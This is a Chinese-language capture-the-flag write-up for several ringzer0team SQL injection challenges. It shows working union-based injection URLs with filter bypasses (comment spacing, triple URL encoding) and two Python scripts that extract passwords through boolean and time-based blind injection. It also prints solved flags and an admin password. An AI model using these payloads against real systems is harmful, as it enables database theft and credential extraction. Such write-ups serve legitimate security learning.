ringzer0team.com ctf 记录

-sql 注入篇 ：

Quote of the day --有回显，尝试union 注入。 发现过滤了空格。 用 /**/ 或%0a 

https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,database()

得出 当前数据库为   sqli_quote

https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=0x73716c695f71756f7465)

得出 Quote of the day: alkdjf4iu,quotes

https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x616c6b646a66346975)

得出列 Quote of the day: id,flag

https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/flag/**/from/**/alkdjf4iu/**/limit/**/0,1)

得出 flag   Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

=====

Thinking outside the box is the key 可以看出是sqlite 的union 注入。 下面的语句显示sqlite 版本号 。 

https://ringzer0team.com/challenges/39/?id=3 union select 1,sqlite_version() #


https://ringzer0team.com/challenges/39/?id=3%20union%20select%201,(select%20name%20from%20sqlite_master%20limit%200,1)%20#

https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(tbl_name) from sqlite_master where type='table')

猜表名字  ， random_stuff,ajklshfajks,troll,aatroll 

https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(sql) from sqlite_master where name='ajklshfajks')

CREATE TABLE ajklshfajks (flag varchar(40)) 

https://ringzer0team.com/challenges/39/?id=3 union select 1,(select flag from ajklshfajks limit 0,1 )

FLAG-13lIBUTHNFLEprz2KKMx6yqV   

=============

When it's lite it's not necessarily easy


输入 admin ，1  ，提示Invalid username / password.
输入1，1 ，提示No user found.。 




猜测，其先判断了用户名，如果根据用户名能查到，则继续比较密码。 
故为常见的 布尔盲注。 


payload ：
password=1&username=1' or ('4'='5') and 'a'='a  ， 提示 No user found


password=1&username=1' or ('4'='4') and 'a'='a  ， 提示 Invalid username / password


换句话说，只要 '4'='4' 这个语句正确，则提示  Invalid username / password。 

python 脚本。  

import requests
import string
url = "https://ringzer0team.com/challenges/19"
cookie = {
    "PHPSESSID":"q9k4np79r1uf4fuss3lt0lreh1",
    "_ga":"GA1.2.884720986.1529671391",
    "_gid":"GA1.2.884720986.1529671391"
}

flag = ""
for i in range(1,10):
    print "i:",i
    for j in "0123456789" + string.letters + "-_!@#$^&*()={}":
        data = {
            "username": "1' or (substr((select password from users where username='admin'),%s,1)='%s') and 'a'='a" % (i, j),
            # "username": "1' or (substr((select password from users where username ='admin' limit 0,1),1,1)='4') and 'a'='a",
            "password":"1" #4dm1nzP455
        }

        r = requests.post(data=data,url=url,cookies=cookie)
        if "Invalid username / password" in r.content:
            flag += j
            print flag
            break

 


 

No more hacking for me!   

根据源码


<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->
可以看出 ' 进行了过滤。 
加上浏览器本身的url 解码，则共三次解码。 
对 单引号进行三次编码，得出 %25252
尝试 联合注入，发现共有三列。 








https://ringzer0team.com/challenges/74/?id=1 %252527 union select 1,2,3--
回显 2. 
故枚举。 


http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 -- 


random_data  CREATE TABLE random_data (id int, message varchar(50), display int) 


http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --


注意 为什么sqlite 的枚举是这样写的，还需要继续研究。 

=============

Login portal 4

时间盲注：

import requests
url = "https://ringzer0team.com/challenges/6"
cookie = {
    "PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
    "_ga":"GA1.2.1724649637.1519735081",
    "_gid":"GA1.2.933125333.1519735081",
    "_gat":"1"
}
flag = ""
for i in range(1,1000):
    for j in range(33,127):
        print "i:", i,"j:",j
        data = {
            "username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
            "password":"1"
        }
        try:
            r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
        except:
            flag += chr(j)
            print flag
            break

代码有几点说明： 

1.  为什么用ascii 比较，而不是直接字符串比较， 是因为mysql 字符串不区分大小写。

2. || 而不是or  ，根据验证猜测是后台屏蔽了。